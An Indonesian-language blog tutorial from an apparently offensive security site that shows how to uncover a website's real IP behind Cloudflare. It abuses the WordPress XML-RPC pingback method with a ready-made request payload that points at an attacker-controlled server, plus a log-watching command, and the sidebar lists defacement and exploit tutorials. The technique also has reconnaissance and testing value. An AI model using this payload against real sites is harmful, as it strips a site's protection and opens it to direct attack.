• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress

March 5, 2020 by Jack Wilder 1 Comment

Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback. Ada banyak cara yang bisa dilakukan untuk menemukan IP dibalik Cloudflare. Yang paling lazim digunakan adalah menggunakan DNS history. Namun jika website tersebut memiliki fungsi Pingback XMLRPC, misalnya WordPress, kita bisa memanfaatkan service tersebut untuk mengetahui IP dibalik Cloudflare.

Sebelum memulai tutorial ini, pastikan kalian juga memiliki satu buah VPS atau server yang sudah terinstall webserver.

Pertama, kita cek A record dari web target.

Terlihat dari screenshot diatas bahwa web tersebut menggunakan Cloudflare.

Oke, selanjutnya kita cek apakah website tersebut memiliki fungsi ping di XMLRPCnya. Di WordPress, kalian bisa melakukan post request ke file xmlrpc.php

Berikut request yang dikirim untuk melihat seluruh method yang bisa digunakan.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Jika method pingback.ping tersedia, kita bisa lanjut.

Selanjutnya kita login ke server kita, dan pantau access log ke web server.

Contoh

tail -f /var/log/nginx/access.log | grep cloudflare_bypass

Selanjutnya kita balik lagi ke web target. Buat request dengan method pingback.ping. Formatnya adalah

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://ip_server_kita/cloudflare_bypass</string>
</value>
</param>
<param>
<value>
<string>http://webtarget.com/postingan-artikel/</string>
</value>
</param>
</params>
</methodCall>

Jadi di web target harus ada artikel valid yang bisa kita gunakan untuk melakukan pingback. Untuk IP server kita, maksudnya adalah IP server VPS yang kita miliki. Pastikan juga web servernya sudah diaktifkan sehingga kita bisa cek log akses nya.

Contoh request dan respon nya di Burp Suite.

Dan di log access VPS kita, yang tercatat adalah IP asli web target, bukan lagi IP Cloudflare.

Selesai.

Sebenarnya kita juga bisa melakukan request ke file xmlrpc.php menggunakan curl. Namun di tutorial ini saya gunakan Burp Suite agar lebih jelas.

Oke mungkin itu saja tutorial kali ini, jika ada yang kurang jelas silahkan tinggalkan komentar.

Shares

Filed Under: Reconnaissance

Reader Interactions

Comments

  1. Karjok pangesty says

    November 17, 2020 at 8:47 am

    Mantepp

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tumblr Custom Domain or Subdomain Takeover

Laravel PHPUnit Remote Code Execution

MIME Type Sniffing pada Form Upload Gambar

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Tool Deface Opencart Bruteforce and Upload Image

Readme.io Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Deface dengan Metode Timthumb Remote Code Execution

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Powered by WordPress and Genesis Framework. Style by LinuxSec.